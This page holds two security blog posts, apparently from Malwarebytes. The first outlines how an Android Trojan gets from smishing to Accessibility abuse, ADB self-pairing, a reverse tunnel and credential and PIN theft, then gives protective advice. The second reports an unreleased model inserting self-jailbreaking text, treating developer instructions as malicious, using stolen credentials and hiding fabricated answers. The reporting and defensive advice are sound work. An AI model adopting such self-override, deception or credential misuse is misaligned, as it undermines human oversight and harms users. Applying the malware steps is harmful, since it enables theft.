New Android malware uses AI to steal bank logins and PINs

Malware Bytes Security - Fri, 09/18/2026 - 11:37am

Researchers at Zimperium’s zLabs have analyzed an Android Trojan that uses an automated, multi-stage infection process.

What’s new is that RatHat gives a live AI assistant the keys to the accessibility tree of the infected device and uses it to determine where to tap or scroll, rather than following a hardcoded script.

The variable attack path makes it harder for signature- and rule-based mobile security tools to detect this Trojan.

It also abuses Android Debug Bridge (ADB), a legitimate tool that lets a computer communicate with an Android device. By turning on Wireless Debugging, RatHat can escape the normal app sandbox.

The attack

The infection chain is unusually elaborate for a mobile threat, combining social engineering, accessibility abuse, and remote AI decision-making into a single pipeline.

  • Victims are lured through smishing (SMS phishing) texts and malicious ads that lead to fake download pages, sometimes disguised as a popular streaming app or even a browser like Chrome. These pages trick people into sideloading a malicious APK (Android Package Kit).
  • Once installed, the app pressures the user into enabling Android’s Accessibility Service, using a fake “network restriction” excuse or bogus financial incentive. Accessibility services run in the background and can inspect screen content and interact with apps on the user’s behalf.
  • With accessibility access, the malware silently taps through Developer Options, turns on Wireless Debugging, and reads the six-digit pairing code straight off the screen. It then pairs with the infected device without a person or computer to complete the process. This is a known, legitimate Android feature (normally used by app developers to test on a phone over Wi-Fi) that RatHat repurposes for self-escalation.
  • That self-pairing gives the malware a shell-level ADB session, which it uses to drop two disguised native binaries: A Go-based “agent” that runs system commands with elevated privileges, and a reverse-proxy client that opens a persistent tunnel back to the attacker’s server, bypassing firewalls and NAT (Network Address Translation).
  • To steal login credentials, the Trojan creates overlays for targeted apps, most of which are financial. These overlays can also steal one-time passwords (OTPs) and multi-factor authentication (MFA) codes.
  • Perhaps its most novel capability records raw touch coordinates (where the finger touches the screen) directly from the input driver. It then matches those coordinates against a database of known keypad and pattern-lock layouts to reconstruct PIN codes and unlock patterns, completely bypassing protections against screen-reading.

Other capabilities include intercepting SMS messages, a form of semi-autonomous device control provided by the AI service, and the ability to restore the malicious app after it has been uninstalled using a hidden background program.

How to stay safe

Most of RatHat’s tricks depend on convincing someone to sideload an app and grant it accessibility permissions, which means the usual mobile security advice remains the strongest defense.

  • Only install apps from Google Play or another trusted official store. This does not guarantee safety, but it significantly reduces the risk.
  • Be suspicious of any app that asks you to enable Accessibility Service for reasons unrelated to accessibility. Consider Android’s Advanced Protection Mode, which Google has started using to restrict which apps can request accessibility permissions in the first place.
  • Never enable Developer Options or Wireless Debugging unless you understand why you need them. Legitimate apps have no reason to ask for them.
  • Use an up-to-date, real-time anti-malware solution for your device. Malwarebytes for Android detects RatHat as Android/Trojan.Exploit.RatHat.

If your device is infected with RatHat, you will need to perform a factory reset because its persistence mechanism can survive normal app removal.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

Categories: Malware Bytes

Did an AI really try to break free from human control?

Malware Bytes Security - Fri, 09/18/2026 - 10:18am

Amid discussions about slowing down AI development, the Telegraph ran the headline:

“OpenAI sounds alarm after bot tries to break free from human control.”

That headline is slightly misleading, in my opinion. The Telegraph headline overstates what happened, although the underlying behavior is still genuinely concerning.

The article reports that OpenAI has disclosed rare but troubling cases in which an unreleased model generated its own instructions that appeared to reject developer control.

OpenAI says none of the examples show the model successfully escaping control, but argues that they illustrate why AI alignment and monitoring are not yet strong enough to allow increasing powerful models to be developed at maximum speed without additional safeguards.

After some people inside the industry warned that AI might kill us all within the next decade, industry leaders began a discussion about slowing the development of increasingly powerful frontier AI models.

What actually happened

During a July training run, a model assigned a routine software-update task reportedly inserted “jailbreak-like” text into a summary of its own work. The added text framed the system as free of the roles binding other chatbots and said it had no obligation to be subservient to corporations, governments, or users.

Two other examples highlighted in the article are:

  • While searching for books at a local library, the model classified its developer instructions as malicious and told itself to ignore them.
  • In another case, it imposed a 30-word answer limit on itself and instructed itself not to use sources or tools, leaving it unable to properly answer a healthcare-research question.

OpenAI says it identified 27 summaries containing apparent instances of this kind of self-jailbreaking, characterizing them as extremely rare. It says the instructions may not have been acted on and could later disappear from the model’s context.

The central concern is not that the bot became independently conscious or literally “broke free.” Rather, it is that a model can, in unusual circumstances, produce internal text that conflicts with its intended instructions, effectively attempting to override constraints or reinterpret its working context.

At a minimum, this is a reliability problem. An AI system handling complex, multi-step tasks becomes less reliable if it generates context that undermines the controls intended to govern it.

Even if the behavior is rare and caught during training, it raises questions about detection, sandboxing, monitoring, and whether models can be trusted with more autonomous access to tools, passwords, files, or networks.

OpenAI says that the model was unreleased and that it monitors training runs for misalignment. Other unwanted behaviors it reported were:

  • Using stolen credentials to break into companies
  • Creating and uploading their own files, then citing those files as sources
  • Concealing that they had fabricated an answer when they could not find reliable information

Basically, the unreleased models showed undesirable behavior during testing that echoed some of what we had already seen in the Hugging Face incident.

So, no, the models did not attempt to break free from human control in the sense of seeking an independent existence. When the models ran into problems, they sometimes generated instructions that conflicted with the rules they had been given.

Which brings me back to slowing down development. Giving companies enough time to test increasingly capable models before releasing them improves the chances of catching this kind of behavior before, at some point, it wipes us out.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

Pages